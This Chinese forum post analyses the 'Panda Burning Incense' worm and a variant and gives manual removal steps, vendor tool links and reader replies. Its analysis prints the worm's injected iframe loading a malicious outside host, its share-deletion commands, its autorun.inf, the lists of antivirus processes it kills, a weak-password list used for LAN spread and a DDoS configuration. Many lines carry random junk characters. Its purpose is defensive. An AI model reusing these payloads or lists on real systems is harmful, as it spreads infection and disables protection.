熊猫烧香病毒专杀及手动修复方案

鱼宝宝

介绍一下熊猫烧香病毒、熊猫烧香病毒变种的查杀方法，及熊猫烧香病毒的手动清除方案。提供了病毒进程为spoclsv.exe和FuckJacks.exe变种的解决方案，和熊猫烧香病毒专杀工具。

在动手查杀熊猫烧香病毒之前，强烈建议先注意以下四点：

1.本文包含两种熊猫烧香病毒变种的描述，请注意查看病毒症状，根据实际情况选用不同的查杀方法。

2.对于被熊猫烧香病毒感染的.exe可执行文件，推荐先备份，再修复！

3.找回被熊猫烧香病毒删除的ghost(.gho)文件，详情请见文中！

4.对计算机了解不多的用户，请在专家指导下清除熊猫烧香病毒。

熊猫烧香病毒变种一：病毒进程为“spoclsv.exe”

这是“熊猫烧香”早期变种之一，特别之处是“杀死杀毒软件”，最恶劣之处在于感染全盘.exe文件和删除.gho文件（Ghost的镜像文件）。最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码，且一定要清除。否则访问了有此代码的网页，又会感染。其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。就不再单独列出。

病毒描述：

“武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，（.gho为GHOST的备份文件），使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

以下是熊猫烧香病毒详细行为和解决办法：

熊猫烧香病毒详细行为：

1.复制自身到系统目录下：

%System%\drivers\spoclsv.exe（“%System%”代表Windows所在目录，比如：C:\Windows）
- ~$ `) [9 i) e不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。

( ]9 m# s% N1 X4 Z6 B2.创建启动项：
( V9 v& M  a6 }( M7 m! l9 l[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
# p# g, F3 g# ^& t" @$ C: T　　"svcshare"="%System%\drivers\spoclsv.exe"
$ h5 f) q" \4 ]* j( M# R! Q
( V/ V7 O1 b% D3.在各分区根目录生成病毒副本：　　X:\setup.exe
　　X:\autorun.inf
8 w1 R+ G: r" G- O* k( `3 V- Z+ Eautorun.inf内容：
' i- W) f. A1 a+ L) p# R4 O+ `[AutoRun]
! ~" I3 C% a! v9 a　　OPEN=setup.exe
　　shellexecute=setup.exe
" A! m% y3 O  I; M2 J& q: y　　shell\Auto\command=setup.exe

: h/ D& N9 r4 N4.使用net share命令关闭管理共享：
cmd.exe /c net share X$ /del /y
　　cmd.exe /c net share admin$ /del /y

6 x" u( T! [$ u$ z+ E0 C9 k( @7 N5.修改“显示所有文件和文件夹”设置：
& m' v5 g: ^3 ~5 U: @/ B[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
2 Q+ Y9 |$ h0 n　　\Explorer\Advanced\Folder\Hidden\SHOWALL]
$ k0 R8 H; M" g/ r' y　　"CheckedValue"=dword:00000000
5 h2 s3 U; Z" g2 g+ @! ?
6.熊猫烧香病毒尝试关闭安全软件相关窗口：
天网
, K5 u' a7 ]7 f; p防火墙进程
6 |8 _' |1 B" q% B# X% _4 jVirusScan
NOD32
) c8 ]$ o& I9 x" i3 M* n网镖杀毒毒霸瑞星江民黄山IE
超级兔子优化大师木马清道夫木馬清道夫
* k3 z( v( w: kQQ病毒注册表编辑器系统配置实用程序卡巴斯基反病毒
Symantec AntiVirus
Duba
  P; M0 _' c9 f8 z! WWindows 任务管理器
& H6 R! @+ [0 A& w' U: T! [1 _esteem procs
绿鹰PC
密码防盗噬菌体木马辅助查找器
System Safety Monitor
) I2 k0 [# W3 b% z3 R& QWrapped gift Killer
7 W7 j- L7 ]6 s1 JWinsock Expert
, s0 Y2 u9 h1 x  G游戏木马检测大师超级巡警
msctls_statusbar32
pjf(ustc)
IceSword
/ m% Y7 J: M; U. Y, O/ l& B( t
7.尝试结束安全软件相关进程以及Viking病毒（威金病毒）进程：
Mcshield.exe
; H! J4 [3 ^+ f# i. G　　VsTskMgr.exe
& ?4 |5 w/ G( U# \$ G- [　　naPrdMgr.exe
5 Y; P; _' M) e: W　　UpdaterUI.exe
　　TBMon.exe
) C/ N4 u/ J9 M+ D2 }; l　　scan32.exe
* W6 C& J2 r5 h1 q8 C& O: V- _　　Ravmond.exe
- e/ m* g8 m' h& a" M　　CCenter.exe
　　RavTask.exe
! o' ]/ c4 ~% s0 M  R( B　　Rav.exe
　　Ravmon.exe
' g0 R# m+ M  \2 E9 v/ V5 g. D　　RavmonD.exe
) b& V8 J. I$ f  n* [, B, d0 W  Z　　RavStub.exe
' I, U% O6 X) d! c! |* k　　KVXP.kxp
5 E/ Z) _. s1 k9 `# g- r7 P　　KvMonXP.kxp
　　KVCenter.kxp
3 R4 l0 B6 v) P　　KVSrvXP.exe
　　KRegEx.exe
3 x+ m* J/ ~) Q+ \$ P　　UIHost.exe
　　TrojDie.kxp
3 o4 e) R4 m/ l0 j: W' V% r　　FrogAgent.exe
　　Logo1_.exe
' S( H2 @& R: ^$ C# [1 ^; B　　Logo_1.exe
$ m: e( n9 C3 H0 z* O2 i　　Rundl132.exe

8.禁用安全软件相关服务：
Schedule
　　sharedaccess
  s$ O4 _0 S! L9 R6 e　　RsCCenter
　　RsRavMon
6 |& L5 b9 _0 l# m, `! e0 K$ r+ V　　KVWSC
　　KVSrvXP
　　kavsvc
　　AVP
　　McAfeeFramework
9 n1 b! k4 A. U& E' a# [　　McShield
$ I/ W/ k8 x, v$ R8 G　　McTaskManager
　　navapsvc
; Z* o8 I" L& P* g　　wscsvc
　　KPfwSvc
% L  e! R% q  w. w( [　　SNDSrvc
! R& |- g0 F6 ~　　ccProxy
2 [" Y5 G; j8 r2 ^4 w) h　　ccEvtMgr
　　ccSetMgr
" C! {1 Y0 X$ z　　SPBBCSvc
　　Symantec Core LC
　　NPFMntor
　　MskService
/ R' [( {: o- u　　FireSvc

9.删除安全软件相关启动项：
6 B2 N+ T7 ^( y) N% i: ySOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
6 n$ H, J- F8 w3 f. `3 q' V2 x　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error           
- u: d1 f0 \# D/ t' g7 {+ R7 PReporting Service
; {0 l+ X5 j4 G" i) Z　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
9 F( s& W% X2 C　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
* a: ]7 ?% ~* F+ S　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse
10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：
<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
但不修改以下目录中的网页文件：
C:\WINDOWS
　　C:\WINNT
　　C:\system32
　　C:\Documents and Settings
　　C:\System Volume Information
% _" f8 j( H, R! S1 ~9 ^　　C:\Recycled
8 u1 g4 j# @; ?+ ?; n' }　　Program Files\Windows NT
　　Program Files\WindowsUpdate
* Q9 G3 |: t+ r+ J, W( D5 G　　Program Files\Windows Media Player
　　Program Files\Outlook Express
8 J$ S: c5 J% B/ Q　　Program Files\Internet Explorer
' i; [1 a) P8 o7 J# s/ V+ G　　Program Files\NetMeeting
　　Program Files\Common Files
: ~6 s1 f. [7 ~% f6 Z" X　　Program Files\ComPlus Applications
( ^( ~0 C( G- {　　Program Files\Messenger
　　Program Files\InstallShield Installation Information
　　Program Files\MSN
" j$ U6 r/ @' k! K! F　　Program Files\Microsoft Frontpage
# a( n7 [8 P- Z- C8 R4 V7 q* M7 R　　Program Files\Movie Maker
　　Program Files\MSN Gamin Zone
+ P8 D5 X9 K, w8 w11.在访问过的目录下生成Desktop_.ini文件，内容为当前日期。
) T; h3 C% Z* _. Y& w12.此外，病毒还会尝试删除GHO文件。
* o* c' l8 {, K! r0 o; L9 d# c3 _% b5 N) k病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中：　　password
( t% h: K' |1 e" _8 z$ p. ]　　harley
　　golf
　　pussy
　　mustang
　　shadow
6 ^& F/ o8 q. l2 p3 E9 i　　fish
　　qwerty
　　baseball
　　letmein
* A6 s- O8 L: P' W　　ccc
　　admin
　　abc
　　pass
　　passwd
7 j$ p# w; |! N. x$ c% H　　database
　　abcd
　　abc123
/ ^- x5 k( `7 A7 L1 h; n. L2 s, ?　　sybase
　　123qwe
　　server
+ y7 d9 N. J9 {' R9 W　　computer
　　super
　　123asd
　　ihavenopass
　　godblessyou
　　enable
4 r! }8 T* X4 I/ |" P/ E' A4 S　　alpha
! x9 @, x" B4 [# ~- {. D　　1234qwer
　　123abc
: i# w# u% n3 g" y) L/ _# z) z" c　　aaa
　　patrick
3 V# K, f' i$ t7 N. ~4 z6 w　　pat
　　administrator
　　root
$ t0 w, m8 A2 @: H2 i0 S1 _　　sex
　　god
　　fuckyou
　　fuck
2 \. h) L. m5 k8 h& r+ Q+ n1 W　　test
6 F* p  [2 A# D+ j$ m( X　　test123
* n1 S( M3 q9 [" x3 t& j' w　　temp
' y: ]+ K7 N0 V9 g! @& S4 n, j& \　　temp123
1 T- d: R7 @8 O1 |; Z　　win
- G0 W5 `8 H, k$ |　　asdf
. G- [7 N6 g% R) ?. V　　pwd
# Z2 u+ B+ W4 ?　　qwer
　　yxcv
　　zxcv
) G9 ?; D! W- n! p! z3 e2 q3 t　　home
/ |  l) Q- j+ H/ n7 p　　xxx
; Q; X4 k& a* x! w$ m　　owner
　　login
* |7 y: _# _5 r" v: R/ y& t0 K　　Login
　　love
/ G9 c  m0 c+ k6 K7 U  Y3 ~4 ^5 ~　　mypc
　　mypc123
# }7 g: E2 P, W6 Q　　admin123
. i0 [- W9 J3 s" o- b/ ]　　mypass
　　mypass123
　　Administrator
　　Guest
　　admin
  Y9 K, `; p, x2 A$ a　　Root

病毒文件内含有这些信息：

& k% v+ @+ n7 o; y4 k: ewhboy
　　***武*汉*男*生*感*染*下*载*者***
解决方案：

# W9 B- b% B7 ~1. 结束病毒进程：
7 _/ G3 g5 O0 K5 h. E7 W$ q. r%System%\drivers\spoclsv.exe
+ h7 C+ Q9 j% Z: }3 s9 c( ~不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。但可用此方法清除。
; M) f& r; y1 `( T2 P1 S  Q“%System%\system32\spoclsv.exe”是系统文件。（目前看来没有出现插入该系统进程的变种，不排除变种的手法变化。）
查看当前运行spoclsv.exe的路径，可使用超级兔子魔法设置。

4 ^' U  ]7 b$ F/ F2. 删除病毒文件：
. q+ X- b& [- y6 R+ D%System%\drivers\spoclsv.exe
0 [/ g% {$ g) A, c9 Y. m1 N请注意区分病毒和系统文件。详见步骤1。

3. 删除病毒启动项：
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　"svcshare"="%System%\drivers\spoclsv.exe"

4. 通过分区盘符右键菜单中的“打开”进入分区根目录，删除根目录下的病毒文件：
X:\setup.exe
* I3 \- r( }3 n+ X& E: p　　X:\autorun.inf
8 W# E' I' \  O- l% h0 G( x
" A0 ?9 q2 k; ~* _5. 恢复被修改的“显示所有文件和文件夹”设置：
0 E, Z+ ?" R7 X' R/ m# {) Q[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
( Q! ~6 k+ r2 j* Y! O& j3 u9 \6 \9 Z8 ]　　\Explorer\Advanced\Folder\Hidden\SHOWALL]
　　"CheckedValue"=dword:00000001
6 G9 i6 ?6 Z# A' m7 ]+ a' h# I
! ]# R# \0 @8 H# ^6. 修复或重新安装被破坏的安全软件。
" `7 F2 K, _  @# m# I& S
; m7 ]; d0 U1 Y9 T8 B6 c0 a: G% j# r7.修复被感染的程序。可用专杀工具进行修复，收集了四个供读者使用。
金山熊猫烧香病毒专杀工具
http://down.www.kingsoft.com/db/download/othertools/DuBaTool_WhBoy.BAT
5 n0 u5 V. L# L! p7 n) ^8 P7 E安天熊猫烧香病毒专杀工具
3 v3 H+ B) Q: K7 S# h! xhttp://www.antiy.com/download/KillPP.scr
* ]( ?8 U9 |) V+ l江民熊猫烧香病毒专杀工具
http://ec.jiangmin.com/test/PandaKiller.rar
瑞星熊猫烧香病毒专杀工具
http://download.rising.com.cn/zsgj/NimayaKiller.scr
。也可用手动方法（见本文末）。
9 w- L1 N: m: T) f! K
: q/ h$ t. O" Y+ F( G* r% z! g8. 恢复被修改的网页文件，可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件，一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。

熊猫烧香病毒变种二：病毒进程为“FuckJacks.exe”
6 _- B8 h+ i, i$ e
4 y3 o3 G8 q( S" j  l' c& o3 L$ [以下是数据安全实验室提供的信息与方法。
病毒描述：
- h/ q5 c7 }" i/ g7 \# s含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。
7 [! w3 I: Y/ q5 L4 s. D0 ^
病毒基本情况：

[文件信息]

病毒名: Virus.Win32.EvilPanda.a.ex$
* I' @) k; w/ B  k4 F　　大小: 0xDA00 (55808), (disk) 0xDA00 (55808)
　　SHA1  : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D
　　壳信息: 未知　　危害级别：高
) f5 e2 r/ L0 z
病毒名: Flooder.Win32.FloodBots.a.ex$
$ D; ]# T+ c- ~8 t4 ?  s: [　　大  小: 0xE800 (59392), (disk) 0xE800 (59392)
- U/ q* T8 J" h　　SHA1  : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D
　　壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24
　　危害级别：高

病毒行为：
- c' u0 A% A3 s1 E- u  l6 x0 y6 }
Virus.Win32.EvilPanda.a.ex$ ：

1、病毒体执行后，将自身拷贝到系统目录：
/ m* S, z5 ^: z# r. o: e0 K8 j%SystemRoot%\system32\FuckJacks.exe
% H, i; e$ T7 M0 o
" t1 `6 d/ y) G$ @
9 z( P/ B; b( |* x　　2、添加注册表启动项目确保自身在系统重启动后被加载：
键路径：HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
5 x3 ^8 Y9 g, R9 q9 X0 n　　键名：FuckJacks
　　键值："C:WINDOWS\system32\FuckJacks.exe"

$ ~2 W7 V* D- z, {3 Z' T( N键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：svohost
: _: W- Z) B0 G! s　　键值："C:WINDOWS\system32\FuckJacks.exe"

3、拷贝自身到所有驱动器根目录，命名为Setup.exe，并生成一个autorun.inf使得用户打开该盘运行病毒，并将这两个文件属性设置为隐藏、只读、系统。
2 `2 M. _: @% G) R* j) c7 ~1 [C:autorun.inf    1KB    RHS
　　C:setup.exe    230KB    RHS
* o9 n$ ]# S4 I1 Z/ r( `
4、关闭众多杀毒软件和安全工具。

  x+ A4 t7 M( P* k. V/ o/ s; h5、连接*****.3322.org下载某文件，并根据该文件记录的地址，去www.****.com下载某ddos程序，下载成功后执行该程序。

6、刷新bbs.qq.com，某QQ秀链接。

1 g; f3 p- v. h) y" R% b  x# b7、循环遍历磁盘目录，感染文件，对关键系统文件跳过，不感染Windows媒体播放器、MSN、IE 等程序。

Flooder.Win32.FloodBots.a.ex$ ：

1、病毒体执行后，将自身拷贝到系统目录：
%SystemRoot%\SVCH0ST.EXE（注意文件名中的“0”是数字“零”，不是字母“o”）　　%SystemRoot%\system32\SVCH0ST.EXE（注意文件名中的“0”是数字“零”，不是字母“o”）
1 a, f; L& k0 F6 Q6 s
+ w1 [7 F" N; w1 s! I- S$ x2、该病毒后下载运行后，添加注册表启动项目确保自身在系统重启动后被加载：
键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：Userinit
; Z/ I* L6 N) k; W- b8 G; D　　键值："C:WINDOWS\system32\SVCH0ST.exe"

3、连接ddos2.****.com，获取攻击地址列表和攻击配置，并根据配置文件，进行相应的攻击。
" y; Y4 n5 I! y- Q配置文件如下：
www。victim.net:3389
　　www。victim.net:80
8 @7 |+ B. h% ~; ]9 j% f　　www。victim.com:80
; D8 ~) |; B6 c% w. A　　www。victim.net:80
, `: L0 G: ?& u/ W8 {6 N0 N2 K　　1
　　1
/ ^; V+ `; y% ?1 Z+ w　　120
% T0 f5 V" j6 i% X　　50000
  V+ p3 Y/ d& s# q& O
解决方案：

1. 断开网络

2. 结束病毒进程：%System%\FuckJacks.exe

/ l# ?8 k# P' |$ V3. 删除病毒文件：%System%\FuckJacks.exe
. g8 Z2 o% h. W0 }" {4 c
4. 右键点击分区盘符，点击右键菜单中的“打开”进入分区根目录，删除根目录下的文件：X:\autorun.inf
# n3 T, p* |6 H/ O8 m　　X:\setup.exe

: E" {# {$ F3 [) X  N0 D5. 删除病毒创建的启动项：
8 U4 X/ i2 k% Y& r2 B5 K[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
2 H3 R  S4 h# q& t　　"FuckJacks"="%System%\FuckJacks.exe"
6 f& c3 }. S0 O0 n7 W3 C' J[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
　　"svohost"="%System%\FuckJacks.exe"

6. 修复或重新安装反病毒软件

% ]" f- R7 e6 l7. 使用反病毒软件或专杀工具进行全盘扫描，清除恢复被感染的exe文件。也可用以下的手动方法恢复文件。

+ Z6 z4 ?8 `2 K) i* u* c% @手动恢复中毒文件（在虚拟机上通过测试，供参考）

, S. Y# \2 F+ Z! c6 c1.在清除病毒文件的同时不删除%SYSTEM%下面释放FuckJacks.exe的这个文件，即执行之前的步骤1、2、4、5。

4 f' g. e: I2 J) }# S1 H/ c; p2 |2.打开“运行”输入“gpedit.msc”打开组策略－本地计算机策略－windows设置－安全设置－软件限制策略－其它规则。在其它规则上右键选择－新散列规则－打开新散列规则窗口
! W8 M' ~$ r& i$ {
3.在文件散列上点击浏览找到%SYSTEM%下面释放FuckJacks.exe文件。安全级别选择－不允许的。确定后重启。
# z6 |& K& }  U% J- i
4.重启后可以双击运行已经被熊猫感染的程序。运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项（不会有问题的）。

/ Q$ z9 \7 a6 D% }7 I1 b5.双击运行被感染的程序已经恢复原来样子了。全部回复后，用SREng把FuckJacks.exe在注册表里的启动项删除即可！

幻镜

其实还有一个很简单的方法可以将伤害降到最小。

就是将那个GHOST备份文件不要设置为后缀GHO

$ W" `/ a& W7 I3 h; P6 j你换一个后缀不就没事了吗？
恢复时后缀只是起显示作用
# X1 c8 B/ C2 a9 Q* o, n只要你选准正确文件就照样恢复

rulingdanny

很讨厌的病毒 最近中找了 真是对卡巴斯基越来越没有信息了 防御能力＝0

Sonic鼠

妈的我也中招了！！！
) }3 E5 ?: N7 c存的片子和游戏全没了！！气死我了！！！
/ S; K# n( E/ m这病毒出现后没想到是金山反应最快~
瑞星都没招真没用~~~哎…………火大啊……

bmx极限运动

谢谢楼主的分享！！

kk11qq

谢谢楼主的分享！！

kk11qq

谢谢楼主的分享！！